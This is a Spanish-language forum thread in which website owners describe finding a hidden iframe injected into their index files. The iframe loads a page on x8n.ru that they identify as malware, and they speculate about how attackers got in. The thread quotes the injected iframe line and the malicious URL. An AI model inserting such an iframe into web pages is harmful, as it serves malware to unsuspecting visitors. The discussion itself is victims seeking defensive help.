dudas con http://x8n.ru:8080/index.php

[xalupeao]

Bueno realmente he buscado informacion sobre esto en google

http://x8n.ru:8080/index.php

y sale simplemente que es un malware...

-------

Les cuento tengo un sitio web y google lo ha bloqueado porque me dice que es unsitio atacante, cosa que no lo es. Pero revisando mis archivos index.php y varios de mis otros index tenian dentro un <iframe src="http://x8n.ru:8080/index.php></iframe> en hidden y bueno obviamente lo borre y todo, pero mi preguntas son.

¿como llego hay?
¿porque afecta mis archivo index?
¿como puedo solucionar esto?


Gracias.

[kamsky]

malware... pues seguramente alguien haya entrado en tu server, o te lo han colado, a saber...

en esta pagina hay muchas mas como esa, pero cuidado donde clickas:

http://www.malwareurl.com/search.php?domain=&s=80.93.90.88&match=0&rp=200&urls=on&redirs=on&ip=on&reverse=on&as=on

[antoniojim]

Nadie tiene más información sobre esto?. a mi me ha pasado igual, varias de mis webs han sido hackeadas y han puesto esta dirección cambiando todos los index, default y main.

Por favor, como han entrado???, puede ser por un agujero de seguridad de flash?

[kamsky]

Por favor, como han entrado???, puede ser por un agujero de seguridad de flash?

jajaja, aquí hay gente muy buena, pero creo que aun no llegan a tener la habilidad de ser adivinos ni nada...como vamos a ser capaces de saber como han entrado a TU server???

[antoniojim]

Pero me refiero más bien a que procedimiento utiliza esta gente.

Estoy pensando que has sido un virus y ha cogido mi historial del filezilla. Pero no estoy seguro.

No se si está gente utiliza ese método o lo hacen por agujeros de seguridad SQL injection o XSS.

Un saludo

[kamsky]

pues depende de lo que tengas en tu server... pueden haber entrado por vulnerabilidades o malas configuraciones en alguno de los servicios, pueden haber entrado por el mas diseño de las aplicaciones web...